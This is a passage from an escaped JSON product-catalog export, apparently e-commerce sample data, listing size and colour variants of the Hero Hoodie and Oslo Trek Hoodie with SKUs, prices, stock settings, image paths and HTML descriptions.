Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-XL-Black\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"109\":{\"sku\":\"MH07-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-XL-Gray\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"110\":{\"sku\":\"MH07-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie-XL-Green\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hero-hoodie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"111\":{\"sku\":\"MH07\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hero Hoodie\",\"description\":\"<p>Gray and black color blocking sets you apart as the Hero Hoodie keeps you warm on the bus, campus or cold mean streets. Slanted outsize front pockets keep your style real . . . convenient.<\\/p>\\n<p>&bull; Full-zip gray and black hoodie.<br \\/>&bull; Ribbed hem.<br \\/>&bull; Standard fit.<br \\/>&bull; Drawcord hood cinch.<br \\/>&bull; Water-resistant coating.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Fleece|Hemp|Polyester,pattern=Color-Blocked,climate=Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH07-XS-Black,size=XS,color=Black|sku=MH07-XS-Gray,size=XS,color=Gray|sku=MH07-XS-Green,size=XS,color=Green|sku=MH07-S-Black,size=S,color=Black|sku=MH07-S-Gray,size=S,color=Gray|sku=MH07-S-Green,size=S,color=Green|sku=MH07-M-Black,size=M,color=Black|sku=MH07-M-Gray,size=M,color=Gray|sku=MH07-M-Green,size=M,color=Green|sku=MH07-L-Black,size=L,color=Black|sku=MH07-L-Gray,size=L,color=Gray|sku=MH07-L-Green,size=L,color=Green|sku=MH07-XL-Black,size=XL,color=Black|sku=MH07-XL-Gray,size=XL,color=Gray|sku=MH07-XL-Green,size=XL,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh07-gray_alt1.jpg,\\/m\\/h\\/mh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Fleece|Hemp|Polyester\",\"pattern\":\"Color-Blocked\",\"climate\":\"Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"112\":{\"sku\":\"MH08-XS-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-XS-Brown\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-xs-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Brown\"},\"113\":{\"sku\":\"MH08-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-XS-Purple\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"114\":{\"sku\":\"MH08-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-XS-Red\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"115\":{\"sku\":\"MH08-S-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-S-Brown\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-s-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Brown\"},\"116\":{\"sku\":\"MH08-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-S-Purple\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"